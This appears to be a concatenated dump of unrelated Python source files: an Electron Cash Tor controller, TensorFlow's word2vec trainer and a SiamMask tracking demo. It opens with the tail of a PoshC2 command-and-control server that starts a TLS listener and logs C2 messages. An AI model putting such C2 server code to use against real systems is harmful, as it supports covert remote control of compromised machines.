httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % PoshProjectDirectory, certfile="%sposh.crt" % PoshProjectDirectory, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (BindIP, BindPort))
sys.exit(0)
if __name__ == '__main__':
args = sys.argv
main(args)
|
controller.py
|
# Electron Cash - lightweight Bitcoin client
# Copyright (C) 2019, 2020 Axel Gembe <derago@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import subprocess
import sys
import threading
import shutil
import socket
import inspect
from enum import IntEnum, unique
from typing import Tuple, Optional
import stem.socket
import stem.process
import stem.control
import stem
from .. import util, version
from ..util import PrintError
from ..utils import Event
from ..simple_config import SimpleConfig
# Python 3.10 workaround for stem package which is using collections.Iterable (removed in 3.10)
if sys.version_info >= (3, 10):
if hasattr(stem, '__version__') and version.parse_package_version(stem.__version__)[:2] <= (1, 8):
import collections.abc
# monkey-patch collections.Iterable back since stem.control expects to see this name
stem.control.collections.Iterable = collections.abc.Iterable
_TOR_ENABLED_KEY = 'tor_enabled'
_TOR_ENABLED_DEFAULT = False
_TOR_SOCKS_PORT_KEY = 'tor_socks_port'
_TOR_SOCKS_PORT_DEFAULT = 0
def check_proxy_bypass_tor_control(*args, **kwargs) -> bool:
"""
This function returns True when called by stem.socket.ControlPort to prevent
the Tor control connection going through a proxied socket.
"""
stack = inspect.stack()
if stack and len(stack) >= 4:
# [0] is this function, [1] is the genexpr in _socksocket_filtered,
# [2] is _socksocket_filtered and [3] is the caller. In newer stem
# versions socket is not called directly but through asyncio.
for s in stack[3:7]:
caller_self = stack[3].frame.f_locals.get('self')
if caller_self and type(caller_self) is stem.socket.ControlPort:
return True
return False
class TorController(PrintError):
@unique
class Status(IntEnum):
STOPPING = 0
STOPPED = 1
STARTED = 2
READY = 3
ERRORED = 4
@unique
class BinaryType(IntEnum):
MISSING = 0
INTEGRATED = 1
SYSTEM = 2
_config: SimpleConfig = None
_tor_process: subprocess.Popen = None
_tor_read_thread: threading.Thread = None
_tor_controller: stem.control.Controller = None
status = Status.STOPPED
status_changed = Event()
active_socks_port: int = None
active_control_port: int = None
active_port_changed = Event()
tor_binary: str
tor_binary_type: BinaryType = BinaryType.MISSING
def __init__(self, config: SimpleConfig):
if not config:
raise AssertionError('TorController: config must be set')
self._config = config
if not self.detect_tor() and self.is_enabled():
self.print_error("Tor enabled but no usable Tor binary found, disabling")
self.set_enabled(False)
socks_port = self._config.get(
_TOR_SOCKS_PORT_KEY, _TOR_SOCKS_PORT_DEFAULT)
if not socks_port or not self._check_port(int(socks_port)):
# If no valid SOCKS port is set yet, we set the default
self._config.set_key(_TOR_SOCKS_PORT_KEY, _TOR_SOCKS_PORT_DEFAULT)
def __del__(self):
self.status_changed.clear()
self.active_port_changed.clear()
# Version 0.4.5.5
# [notice] Opening Socks listener on 127.0.0.1:0
# [notice] Socks listener listening on port 36103.
# [notice] Opened Socks listener connection (ready) on 127.0.0.1:36103
# [notice] Opening Control listener on 127.0.0.1:0
# [notice] Control listener listening on port 36104.
# [notice] Opened Control listener connection (ready) on 127.0.0.1:36104
# Version 0.4.2.5
# [notice] Opening Socks listener on 127.0.0.1:0
# [notice] Socks listener listening on port 36103.
# [notice] Opened Socks listener on 127.0.0.1:36103
# [notice] Opening Control listener on 127.0.0.1:0
# [notice] Control listener listening on port 36104.
# [notice] Opened Control listener on 127.0.0.1:36104
_listener_re = re.compile(r".*\[notice\] ([^ ]*) listener listening on port ([0-9]+)\.?$")
# If a log string matches any of the included regex it is ignored
_ignored_res = [
re.compile(r".*This port is not an HTTP proxy.*"), # This is caused by the network dialog TorDetector
]
def _tor_msg_handler(self, message: str):
if util.is_verbose:
if all(not regex.match(message) for regex in TorController._ignored_res):
self.print_msg(message)
# Check if this is a "Opened listener" message and extract the information
# into the active_socks_port and active_control_port variables
listener_match = TorController._listener_re.match(message)
if listener_match:
listener_type = listener_match.group(1)
listener_port = int(listener_match.group(2))
if listener_type == 'Socks':
self.active_socks_port = listener_port
elif listener_type == 'Control':
self.active_control_port = listener_port
# The control port is the last port opened, so only notify after it
self.active_port_changed(self)
def _read_tor_msg(self):
try:
while self._tor_process and not self._tor_process.poll():
line = self._tor_process.stdout.readline().decode('utf-8', 'replace').strip()
if not line:
break
self._tor_msg_handler(line)
except:
self.print_exception("Exception in Tor message reader")
_orig_subprocess_popen = subprocess.Popen
@staticmethod
def _popen_monkey_patch(*args, **kwargs):
if sys.platform in ('win32'):
if hasattr(subprocess, 'CREATE_NO_WINDOW'):
kwargs['creationflags'] = subprocess.CREATE_NO_WINDOW
else:
kwargs['creationflags'] = 0x08000000 # CREATE_NO_WINDOW, for < Python 3.7
kwargs['start_new_session'] = True
return TorController._orig_subprocess_popen(*args, **kwargs)
@staticmethod
def _get_tor_binary() -> Tuple[Optional[str], BinaryType]:
# Try to locate a bundled tor binary
if sys.platform in ('windows', 'win32'):
res = os.path.join(os.path.dirname(
__file__), '..', '..', 'tor.exe')
else:
res = os.path.join(os.path.dirname(__file__), 'bin', 'tor')
if os.path.isfile(res):
return (res, TorController.BinaryType.INTEGRATED)
# Tor is not packaged / built, try to locate a system tor
res = shutil.which('tor')
if res and os.path.isfile(res):
return (res, TorController.BinaryType.SYSTEM)
return (None, TorController.BinaryType.MISSING)
def detect_tor(self) -> bool:
path, bintype = self._get_tor_binary()
self.tor_binary = path
self.tor_binary_type = bintype
return self.is_available()
def is_available(self) -> bool:
return self.tor_binary_type != TorController.BinaryType.MISSING
def start(self):
if self._tor_process:
# Tor is already running
return
if not self.is_enabled():
# Don't start Tor if not enabled
return
if self.tor_binary_type == TorController.BinaryType.MISSING:
self.print_error("No Tor binary found")
self.status = TorController.Status.ERRORED
self.status_changed(self)
return
# When the socks port is set to zero, we let tor choose one
socks_port = str(self.get_socks_port())
if socks_port == '0':
socks_port = 'auto'
try:
subprocess.Popen = TorController._popen_monkey_patch
self._tor_process = stem.process.launch_tor_with_config(
tor_cmd=self.tor_binary,
completion_percent=0, # We will monitor the bootstrap status
init_msg_handler=self._tor_msg_handler,
take_ownership=True,
close_output=False,
config={
'SocksPort': socks_port,
'ControlPort': 'auto',
'CookieAuthentication': '1',
'DataDirectory': os.path.join(self._config.path, 'tor'),
'Log': 'NOTICE stdout',
},
)
except:
self.print_exception("Failed to start Tor")
self._tor_process = None
self.status = TorController.Status.ERRORED
self.status_changed(self)
return
finally:
subprocess.Popen = TorController._orig_subprocess_popen
self._tor_read_thread = threading.Thread(
target=self._read_tor_msg, name="Tor message reader")
self._tor_read_thread.start()
self.status = TorController.Status.STARTED
self.status_changed(self)
try:
self._tor_controller = stem.control.Controller.from_port(
port=self.active_control_port)
self._tor_controller.authenticate()
self._tor_controller.add_event_listener(
self._handle_network_liveliness_event, stem.control.EventType.NETWORK_LIVENESS) # pylint: disable=no-member
except:
self.print_exception("Failed to connect to Tor control port")
self.stop()
return
self.print_error("started (Tor version {})".format(
self._tor_controller.get_version()))
def stop(self):
if not self._tor_process:
# Tor is not running
return
self.status = TorController.Status.STOPPING
self.status_changed(self)
self.active_socks_port = None
self.active_control_port = None
self.active_port_changed(self)
if self._tor_controller:
# tell tor to shut down
self._tor_controller.signal(stem.Signal.HALT) # pylint: disable=no-member
self._tor_controller.close()
self._tor_controller = None
if self._tor_process:
try:
try:
self._tor_process.wait(1.0)
# if the wait doesn't raise an exception, the process has terminated
except subprocess.TimeoutExpired:
# process is still running, try to terminate it
self._tor_process.terminate()
self._tor_process.wait()
except ProcessLookupError:
self.print_exception("Failed to terminate Tor process")
self._tor_process = None
if self._tor_read_thread:
self._tor_read_thread.join()
self._tor_read_thread = None
self.status = TorController.Status.STOPPED
self.status_changed(self)
self.print_error("stopped")
def _handle_network_liveliness_event(self, event: stem.response.events.NetworkLivenessEvent):
old_status = self.status
self.status = TorController.Status.READY if event.status == 'UP' else TorController.Status.STARTED
if old_status != self.status:
self.status_changed(self)
def _check_port(self, port: int) -> bool:
if not isinstance(port, int):
return False
if port is None:
return False
if port != 0: # Port 0 is automatic
if port < 1024 or port > 65535:
return False
return True
def set_enabled(self, enabled: bool):
self._config.set_key(_TOR_ENABLED_KEY, enabled)
if enabled:
self.start()
else:
self.stop()
def is_enabled(self) -> bool:
return bool(self._config.get(_TOR_ENABLED_KEY, _TOR_ENABLED_DEFAULT))
def set_socks_port(self, port: int):
if not self._check_port(port):
raise AssertionError('TorController: invalid port')
self.stop()
self._config.set_key(_TOR_SOCKS_PORT_KEY, port)
self.start()
def get_socks_port(self) -> int:
socks_port = self._config.get(
_TOR_SOCKS_PORT_KEY, _TOR_SOCKS_PORT_DEFAULT)
if not self._check_port(int(socks_port)):
raise AssertionError('TorController: invalid port')
return int(socks_port)
|
word2vec.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec mini-batched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.
The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
"E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "File consisting of analogies of four tokens."
"embedding 2 - embedding 1 + embedding 3 should be close "
"to embedding 4."
"E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the _targets word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval).")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the _targets word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def forward(self, examples, labels):
"""Build the graph for the forward pass."""
opts = self._options
# Declare all variables we need.
# Embedding: [vocab_size, emb_dim]
init_width = 0.5 / opts.emb_dim
emb = tf.Variable(
tf.random_uniform(
[opts.vocab_size, opts.emb_dim], -init_width, init_width),
name="emb")
self._emb = emb
# Softmax weight: [vocab_size, emb_dim]. Transposed.
sm_w_t = tf.Variable(
tf.zeros([opts.vocab_size, opts.emb_dim]),
name="sm_w_t")
# Softmax bias: [emb_dim].
sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")
# Global step: scalar, i.e., shape [].
self.global_step = tf.Variable(0, name="global_step")
# Nodes to compute the nce loss w/ candidate sampling.
labels_matrix = tf.reshape(
tf.cast(labels,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.num_samples,
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist()))
# Embeddings for examples: [batch_size, emb_dim]
example_emb = tf.nn.embedding_lookup(emb, examples)
# Weights for labels: [batch_size, emb_dim]
true_w = tf.nn.embedding_lookup(sm_w_t, labels)
# Biases for labels: [batch_size, 1]
true_b = tf.nn.embedding_lookup(sm_b, labels)
# Weights for sampled ids: [num_sampled, emb_dim]
sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
# Biases for sampled ids: [num_sampled, 1]
sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)
# True logits: [batch_size, 1]
true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b
# Sampled logits: [batch_size, num_sampled]
# We replicate sampled noise labels for all examples in the batch
# using the matmul.
sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
sampled_logits = tf.matmul(example_emb,
sampled_w,
transpose_b=True) + sampled_b_vec
return true_logits, sampled_logits
def nce_loss(self, true_logits, sampled_logits):
"""Build the graph for the NCE loss."""
# cross-entropy(logits, labels)
opts = self._options
true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
true_logits, tf.ones_like(true_logits))
sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
sampled_logits, tf.zeros_like(sampled_logits))
# NCE-loss is the sum of the true and noise (sampled words)
# contributions, averaged over the batch.
nce_loss_tensor = (tf.reduce_sum(true_xent) +
tf.reduce_sum(sampled_xent)) / opts.batch_size
return nce_loss_tensor
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def build_eval_graph(self):
"""Build the eval graph."""
# Eval graph
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._emb, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of _targets and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, self._options.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
true_logits, sampled_logits = self.forward(examples, labels)
loss = self.nce_loss(true_logits, sampled_logits)
tf.scalar_summary("NCE loss", loss)
self._loss = loss
self.optimize(loss)
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(opts.save_path, self._session.graph)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
while True:
time.sleep(opts.statistics_interval) # Reports our progress once a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
(epoch, step, lr, loss, rate), end="")
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
for t in workers:
t.join()
return epoch
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
new-demo.py
|
import glob
from test import *
import time
import numpy as np
import torch.multiprocessing as mp
import queue as Queue
from multiprocessing import Pool
import itertools
from multiprocessing.dummy import Pool as ThreadPool
from pathos.multiprocessing import ProcessingPool
# import model as modellib
from imageai.Detection import ObjectDetection
import os
execution_path = os.getcwd()
parser = argparse.ArgumentParser(description='PyTorch Tracking Demo')
parser.add_argument('--resume', default='', type=str, required=True,
metavar='PATH',help='path to latest checkpoint (default: none)')
parser.add_argument('--config', dest='config', default='config_davis.json',
help='hyper-parameter of SiamMask in json format')
parser.add_argument('--base_path', default='../../data/tennis', help='datasets')
parser.add_argument('--cpu', action='store_true', help='cpu mode')
args = parser.parse_args()
if __name__ == '__main__':
# Setup device
model="fast"
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
torch.backends.cudnn.benchmark = True
detector = ObjectDetection()
detector.setModelTypeAsRetinaNet()
detector.setModelPath( os.path.join(execution_path , "resnet50_coco_best_v2.0.1.h5"))
detector.loadModel(detection_speed=model)
# Setup Model
cfg = load_config(args)
from custom import Custom
siammask = Custom(anchors=cfg['anchors'])
if args.resume:
assert isfile(args.resume), 'Please download {} first.'.format(args.resume)
siammask = load_pretrain(siammask, args.resume)
siammask.eval().to(device)
# Parse Image fil
img_files = sorted(glob.glob(join(args.base_path, '*.jp*')))
ims = [cv2.imread(imf) for imf in img_files]
# cap = cv2.VideoCapture("/home/ubuntu/Desktop/Videos/nascar_01.mp4")
#cap = cv2.VideoCapture("/home/ubuntu/Desktop/Videos/race.mp4")
cap = cv2.VideoCapture("/Users/alexzhang/Desktop/test_video.mp4")
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
# out = cv2.VideoWriter('/Users/alexzhang/Desktop/output.mp4',cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width,frame_height))
out = cv2.VideoWriter('/Users/alexzhang/Desktop/output.mov',cv2.VideoWriter_fourcc('m','p','4','v'), 15, (frame_width,frame_height))
if(cap.isOpened() == False):
print("Unable to open")
exit()
ret, frame = cap.read()
# Select ROI
cv2.namedWindow("SiamMask", cv2.WND_PROP_FULLSCREEN)
# cv2.setWindowProperty("SiamMask", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
try:
ROIs = cv2.selectROIs('SiamMask', frame, False, False)
except:
print("exit")
exit()
targets = []
for i in ROIs:
x,y,w,h = i
f = 0
toc = 0
while(cap.isOpened()):
# Capture frame-by-frame
ret, frame = cap.read()
# frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if ret == True:
tic = cv2.getTickCount()
if f == 0: # init
count =0
for i in ROIs:
x,y,w,h= i
target_pos = np.array([x + w / 2, y + h / 2])
target_sz = np.array([w, h])
s ={"target_pos":target_pos,"target_sz":target_sz,"x":x,"y":y,"w":w,"h":h}
targets.append(s)
for i in targets:
print(i["target_pos"])
print(i["target_sz"])
# state = siamese_init(frame,tar siammask, cfg['hp'], device=device,targets=targets) # init tracker
state = siamese_init(frame, siammask, cfg['hp'], device=device,targets=targets,detector=detector) # init tracker
# state1 = siamese_init(frame, target_pos1, target_sz1, siammask, cfg['hp'], device=device) # init tracker
elif f > 0: # tracking
state = siamese_track(state, frame)
# pool = ProcessingPool(nodes=1)
# state =pool.map(siamese_track, state, frame)
# results = pool.map(multi_run_wrapper,[(1,2),(2,3),(3,4)])
# state = pool.starmap(siamese_track,zip(state, frame))
# [state, frame, mask_enable=True, refine_enable=True, device=device)]
# my_queue = Queue.Queue()
# processes=[]
# for rank in range(num_processes):
# # state = siamese_track(state, frame, mask_enable=True, refine_enable=True, device=device) # track
# refine_enable=True
# mask_enable=True
# device=device
# p = mp.Process(target=siamese_track,args=(state, frame, mask_enable,refine_enable,my_queue, ))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
# state = my_queue.get()
# print(state)
for i,target in enumerate(state["targets"]):
location = target['ploygon'].flatten()
mask = target['mask'] > state['p'].seg_thr
masks = (mask > 0) * 255
masks = masks.astype(np.uint8)
frame[:, :, 2] = (mask > 0) * 255 + (mask == 0) * frame[:, :, 2]
# frame[:, :, 2] = (mask1 > 0) * 255 + (mask1 == 0) * frame[:, :, 2]
cv2.polylines(frame, [np.int0(location).reshape((-1, 1, 2))], True, (0, 255, 0), 3)
cv2.imshow('SiamMask', frame)
out.write(frame)
print (time.ctime())
print("23")
f= f+1
toc += cv2.getTickCount() - tic
toc /= cv2.getTickFrequency()
fps = f / toc
# Display the resulting frame
# cv2.imshow('Frame',frame)
# Press Q on keyboard to exit
if cv2.waitKey(25) & 0xFF == ord('q'):
break
# Break the loop
else:
break
out.release()
# When everything done, release the video capture object
cap.release()
# Closes all the frames
cv2.destroyAllWindows()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.